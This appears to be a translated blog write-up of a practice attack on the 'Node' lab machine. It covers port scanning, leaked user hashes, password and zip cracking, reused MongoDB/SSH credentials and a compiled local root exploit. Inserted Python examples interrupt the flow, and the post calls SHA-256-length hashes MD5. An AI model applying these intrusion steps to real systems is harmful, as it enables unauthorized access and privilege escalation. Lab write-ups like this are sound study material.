Just a practice run.

Practice on the Node target machine

Environment

  • Target: Ubuntu 16.04.3 LTS node tty1
  • Runtime environment: VMware virtual machine

Process

  • Scan the internal network
    C:\Users\MECHREVO>nmap -sP 192.168.126.0/24
    Starting Nmap 7.70 ( https://nmap.org ) at 2019-07-26 11:38 中国标准时间
    Stats: 0:00:13 elapsed; 0 hosts completed (0 up), 254 undergoing ARP Ping Scan
    Parallel DNS resolution of 254 hosts. Timing: About 50.00% done; ETC: 11:38 (0:00:00 remaining)
    Stats: 0:00:18 elapsed; 0 hosts completed (0 up), 254 undergoing ARP Ping Scan
    Parallel DNS resolution of 254 hosts. Timing: About 50.00% done; ETC: 11:38 (0:00:05 remaining)
    Nmap scan report for 192.168.126.134 (192.168.126.134)
    Host is up (0.00s latency).
    MAC Address: 00:0C:29:F3:9B:1C (VMware)
    Nmap scan report for 192.168.126.254 (192.168.126.254)
    Host is up (0.00s latency).
    MAC Address: 00:50:56:FF:09:F7 (VMware)
    Nmap scan report for 192.168.126.1 (192.168.126.1)
    Host is up.
    Nmap done: 256 IP addresses (3 hosts up) scanned in 24.61 seconds

Found the target's IP address: 192.168.126.134

  • Scan the ports
    C:\Users\MECHREVO>nmap -A -p- 192.168.126.134
    Starting Nmap 7.70 ( https://nmap.org ) at 2019-07-26 11:51 中国标准时间
    Stats: 0:01:10 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
    SYN Stealth Scan Timing: About 41.55% done; ETC: 11:54 (0:01:16 remaining)
    Nmap scan report for 192.168.126.134 (192.168.126.134)
    Host is up (0.00028s latency).
    Not shown: 65533 filtered ports
    PORT STATE SERVICE VERSION
    22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
    | ssh-hostkey:
    | 2048 dc:5e:34:a6:25:db:43:ec:eb:40:f4:96:7b:8e:d1:da (RSA)
    | 256 6c:8e:5e:5f:4f:d5:41:7d:18:95:d1:dc:2e:3f:e5:9c (ECDSA)
    |_ 256 d8:78:b8:5d:85:ff:ad:7b:e6:e2:b5:da:1e:52:62:36 (ED25519)
    3000/tcp open http Node.js Express framework
    | hadoop-datanode-info:
    |_ Logs: /login
    | hadoop-tasktracker-info:
    |_ Logs: /login
    |_http-title: MyPlace
    MAC Address: 00:0C:29:F3:9B:1C (VMware)
    Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
    Device type: general purpose
    Running: Linux 3.X|4.X
    OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
    OS details: Linux 3.10 - 4.11, Linux 3.16 - 4.6, Linux 3.2 - 4.9, Linux 4.4
    Network Distance: 1 hop
    Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

    TRACEROUTE
    HOP RTT ADDRESS
    1 0.28 ms 192.168.126.134 (192.168.126.134)

    OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 134.81 seconds

Two ports are open: 22 and 3000. Port 22 is SSH, and port 3000 is the default port of Node.js.

Visited 192.168.126.134:3000 in a browser.
Captured the traffic to have a look; nothing seemed suspicious.

Try a directory scan:

D:\dirsearch>python dirsearch.py -u http://192.168.126.134:3000/ -e *

_|. _ _ _ _ _ _|_ v0.3.8
(_||| _) (/_(_|| (_| )

Extensions: * | HTTP method: get | Threads: 10 | Wordlist size: 6087

Error Log: D:\学习资料\Python——为了守护我爱的人,我将运行一个牛逼的脚本\dirsearch\logs\errors-19-07-26_12-04-21.log

Target: http://192.168.126.134:3000/

[12:04:21] Starting:
[12:04:38] 301 - 171B - /assets -> /assets/
[12:05:16] 301 - 173B - /uploads -> /uploads/

Task Completed

Looked at both directories; they only contain the site's assets. Nothing of value.

  • Viewing /api/users/latest turned up three accounts.
    [{"_id":"59a7368398aa325cc03ee51d","username":"tom",
    "password":"f0e2e750791171b0391b682ec35835bd6a5c3f7c8d1d0191451ec77b4d75f240","is_admin":false},
    {"_id":"59a7368e98aa325cc03ee51e","username":"mark",
    "password":"de5a1adf4fedcce1533915edc60177547f1057b61b7119fd130e1f7428705f73","is_admin":false},
    {"_id":"59aa9781cced6f1d1490fce9","username":"rastating",
    "password":"5065db2df0d4ee53562c650c29bacf55b97e231e3fe88570abc9edd8b78ac2f0","is_admin":false}]

The passwords in it are MD5-hashed, and the last one cannot be cracked.

But one account is enough.

md5_decode('f0e2e750791171b0391b682ec35835bd6a5c3f7c8d1d0191451ec77b4d75f240') => spongebob
After logging in as tom, I found the account has no admin rights and still can't do anything…

Checked a walkthrough online; at this point you should visit /api/users/

[{"_id":"59a7365b98aa325cc03ee51c","username":"myP14ceAdm1nAcc0uNT",
"password":"dffc504aa55359b9265cbebe1e4032fe600b64475ae3fd29c07d23223334d0af","is_admin":true}]

MD5-decode the password
md5_decode('dffc504aa55359b9265cbebe1e4032fe600b64475ae3fd29c07d23223334d0af') => 'manchester'

Now we have the admin account.

After logging in, the site's source code MyPlace.backup can be downloaded.

But it turned out to be base64-encoded. I tried some online decoding sites, but the results were poor.

Actually it is easy to decode it with PHP directly and save it to a file, as follows
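As an added example (Python, not part of the original post), the following identifies the digest type from its hex length, checks the two plaintexts recovered above against the hashes quoted from /api/users, and contrasts that unsalted storage with a salted PBKDF2 scheme that defeats the lookup-table "decoding" used here. One point worth noting: every digest above is 64 hex characters (256 bits), which is SHA-256's length; an MD5 digest is 32.

```python
import hashlib
import hmac
import os

# Digest length (hex chars) -> algorithm. Unsalted, single-round
# hashes of any of these fall to a plain lookup table.
DIGEST_BY_HEX_LEN = {32: "md5", 40: "sha1", 64: "sha256", 128: "sha512"}

# Hashes copied from the /api/users responses quoted in the post.
TOM_HASH = "f0e2e750791171b0391b682ec35835bd6a5c3f7c8d1d0191451ec77b4d75f240"
ADMIN_HASH = "dffc504aa55359b9265cbebe1e4032fe600b64475ae3fd29c07d23223334d0af"


def identify_digest(hex_digest: str) -> str:
    """Guess the hash function from the digest length alone."""
    if any(c not in "0123456789abcdef" for c in hex_digest.lower()):
        return "unknown"
    return DIGEST_BY_HEX_LEN.get(len(hex_digest), "unknown")


def verify_unsalted(password: str, hex_digest: str) -> bool:
    """Check one candidate against an unsalted digest of the detected type."""
    algo = identify_digest(hex_digest)
    if algo == "unknown":
        return False
    computed = hashlib.new(algo, password.encode()).hexdigest()
    return hmac.compare_digest(computed, hex_digest.lower())


def hash_pbkdf2(password: str, iterations: int = 200_000) -> str:
    """Hardened storage: random per-user salt plus many PBKDF2-HMAC-SHA256 rounds."""
    salt = os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${dk.hex()}"


def verify_pbkdf2(password: str, stored: str) -> bool:
    """Verify against the self-describing string that hash_pbkdf2 produces."""
    try:
        algo, iters, salt_hex, dk_hex = stored.split("$")
        salt = bytes.fromhex(salt_hex)
        rounds = int(iters)
    except ValueError:
        return False
    if algo != "pbkdf2_sha256":
        return False
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, rounds)
    return hmac.compare_digest(dk.hex(), dk_hex)
```

With the salted scheme two users with the same password get different stored strings, so a precomputed table of plain digests no longer applies.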

<?php
// Paste the base64-encoded contents of MyPlace.backup into this string
$file = " /* base64-encoded file contents */ ";
$result = base64_decode($file);
file_put_contents("result.txt", $result);

After decoding, opening the file shows garbage, but the first two characters are 'PK', so it should be a zip archive. Just change result.txt above to result.zip and run it again.

The archive needs a password, so I still need to look into zip password cracking.
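An added example (my own Python, not the post's PHP) of the same decode step with the 'PK' check built in: it base64-decodes the backup, identifies the result from its leading bytes, and reports whether the zip's entries carry the encryption flag, which is the password prompt the post ran into. The sample input is a small zip constructed inside the code; the real input would be the contents of MyPlace.backup.

```python
import base64
import io
import zipfile

# Leading bytes ("magic numbers") that identify common formats; the post
# recognised its decoded backup as a zip from the 'PK' prefix.
MAGIC = {
    b"PK\x03\x04": "zip",
    b"\x1f\x8b": "gzip",
    b"\x89PNG": "png",
    b"%PDF": "pdf",
}


def sniff(data: bytes) -> str:
    """Identify a decoded blob by its leading bytes."""
    for sig, name in MAGIC.items():
        if data.startswith(sig):
            return name
    return "unknown"


def decode_backup(b64_text: str) -> tuple:
    """Base64-decode a backup such as MyPlace.backup, identify it, and for a
    zip report whether any entry is password-protected (general-purpose flag bit 0)."""
    raw = base64.b64decode("".join(b64_text.split()))  # tolerate wrapped lines
    kind = sniff(raw)
    encrypted = None
    if kind == "zip":
        with zipfile.ZipFile(io.BytesIO(raw)) as zf:
            encrypted = any(info.flag_bits & 0x1 for info in zf.infolist())
    return kind, encrypted, raw


def make_sample_backup() -> str:
    """Constructed sample input: a tiny unencrypted zip, base64-encoded
    and wrapped at 76 columns like a typical text dump."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("myplace/app.js", "const express = require('express');\n")
    b64 = base64.b64encode(buf.getvalue()).decode()
    return "\n".join(b64[i:i + 76] for i in range(0, len(b64), 76))
```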


Interlude

While napping just now, I went back to my high-school days,

I dreamed of a girl who stirred my heart, yet was a stranger, sitting in my class,

She was crying, crying very sadly, at her own desk,

I wanted so much to comfort her, but

I only walked past her again and again,

Not daring to speak to her, not daring to hand her a tissue,

She was so helpless, and I could do nothing,

Until I woke, I never learned her name,

Perhaps I will never meet her again…


There are many online sites for cracking archive passwords, but basically all of them cost money…

A Windows cracking tool, Password Unlocker, did not work well in my testing; I suggest avoiding it.

You can use fcrackzip, a tool in Kali, to crack it.

fcrackzip -v -b -u -c a -p magicaaaa myplace
  • -v : verbose output
  • -b : brute force
  • -u : specify the zip format (probably)
  • -c : specify the password character type; the value a means letters only, 1 means digits only, a1 means a mix of digits and letters.
  • -p : specify the password; magicaaaa means the first five characters are known to be magic, and the trailing a's here are a mask meaning those 4 positions are letters.
  • myplace : the name of the archive to crack.

The above is exhaustive brute force, which is probably not very efficient; senior gxy told me that fcrackzip also supports running a dictionary,

fcrackzip -u -D -p /usr/share/wordlists/rockyou.txt myplace.zip

That rockyou.txt will probably come in handy later too.

The password finally obtained is magicword

After extracting, myplace contains the site's source code built on the Node.js framework (so that's where the target's name comes from).

I am not very familiar with Node.js; I learned on Baidu that this framework's project entry point and startup file is app.js.

Opening it, there is a MongoDB connection account and password inside.
const url = 'mongodb://mark:5AYRft73VtFpc84k@localhost:27017/myplace?authMechanism=DEFAULT&authSource=myplace';

Incidentally, I learned that MongoDB is much like MySQL: both are database management systems, just of different types.

Strangely, this database account and password are identical to the Linux account and password, so we can SSH straight into the target system. (This may well be a common pattern; worth trying in future.)

Going into the web directory, the whole directory is owned by root; we cannot write files, so naturally we cannot leave a backdoor. Next we need to escalate privileges on Ubuntu.

First check the system information.

mark@node:/var/www/myplace$ cat /etc/issue
Ubuntu 16.04.3 LTS \n \l

Search for relevant vulnerabilities in kali msfconsole

searchsploit Ubuntu 16.04
[*] exec: searchsploit Ubuntu 16.04

--------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
--------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Apport 2.x (Ubuntu Desktop 12.10 < 16.04) - Local Code Execution | exploits/linux/local/40937.txt
Exim 4 (Debian 8 / Ubuntu 16.04) - Spool Privilege Escalation | exploits/linux/local/40054.c
Google Chrome (Fedora 25 / Ubuntu 16.04) - 'tracker-extract' / 'gnome-video-thumbnailer' + 'totem' Drive-By Download | exploits/linux/local/40943.txt
LightDM (Ubuntu 16.04/16.10) - 'Guest Account' Local Privilege Escalation | exploits/linux/local/41923.txt
Linux Kernel (Debian 7.7/8.5/9.0 / Ubuntu 14.04.2/16.04.2/17.04 / Fedora 22/25 / CentOS 7.3.1611) - 'ldso_hwcap_64 S | exploits/linux_x86-64/local/42275.c
Linux Kernel (Debian 9/10 / Ubuntu 14.04.5/16.04.2/17.04 / Fedora 23/24/25) - 'ldso_dynamic Stack Clash' Local Privi | exploits/linux_x86/local/42276.c
Linux Kernel (Ubuntu 16.04) - Reference Count Overflow Using BPF Maps | exploits/linux/dos/39773.txt
Linux Kernel 4.14.7 (Ubuntu 16.04 / CentOS 7) - (KASLR & SMEP Bypass) Arbitrary File Read | exploits/linux/local/45175.c
Linux Kernel 4.4 (Ubuntu 16.04) - 'BPF' Local Privilege Escalation (Metasploit) | exploits/linux/local/40759.rb
Linux Kernel 4.4 (Ubuntu 16.04) - 'snd_timer_user_ccallback()' Kernel Pointer Leak | exploits/linux/dos/46529.c
Linux Kernel 4.4.0 (Ubuntu 14.04/16.04 x86-64) - 'AF_PACKET' Race Condition Privilege Escalation | exploits/linux_x86-64/local/40871.c
Linux Kernel 4.4.0-21 (Ubuntu 16.04 x64) - Netfilter target_offset Out-of-Bounds Privilege Escalation | exploits/linux_x86-64/local/40049.c
Linux Kernel 4.4.x (Ubuntu 16.04) - 'double-fdput()' bpf(BPF_PROG_LOAD) Privilege Escalation | exploits/linux/local/39772.txt
Linux Kernel 4.6.2 (Ubuntu 16.04.1) - 'IP6T_SO_SET_REPLACE' Local Privilege Escalation | exploits/linux/local/40489.txt
Linux Kernel 4.8 (Ubuntu 16.04) - Leak sctp Kernel Pointer | exploits/linux/dos/45919.c
Linux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora 27) - Local Privilege Escalation | exploits/linux/local/45010.c
Linux Kernel < 4.4.0-116 (Ubuntu 16.04.4) - Local Privilege Escalation | exploits/linux/local/44298.c
Linux Kernel < 4.4.0-21 (Ubuntu 16.04 x64) - 'netfilter target_offset' Local Privilege Escalation | exploits/linux/local/44300.c
Linux Kernel < 4.4.0-83 / < 4.8.0-58 (Ubuntu 14.04/16.04) - Local Privilege Escalation (KASLR / SMEP) | exploits/linux/local/43418.c
--------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result

Use a local Privilege Escalation exploit to escalate.

scp /usr/share/exploitdb/exploits/linux/local/44298.c mark@192.168.6.128:/tmp/

(tmp has fewer permission restrictions, so copy it to this directory.)
After running the command, the C source file is in the directory; it still has to be compiled to become a runnable exploit

gcc -pthread 44298.c -o exp -lcrypt

There are two unfamiliar command options here

  • -pthread: looked it up on Baidu; with this option the compiler selects a thread-safe implementation when compiling. Never mind the details, just add it for now…
  • -lcrypt: here -l is the option and crypt is its value, meaning search for a library named crypt at link time.

After compiling there is an exp binary; after running it, we are already root.

Next I need to learn how to leave a backdoor in a Node.js site framework.

(To be continued…)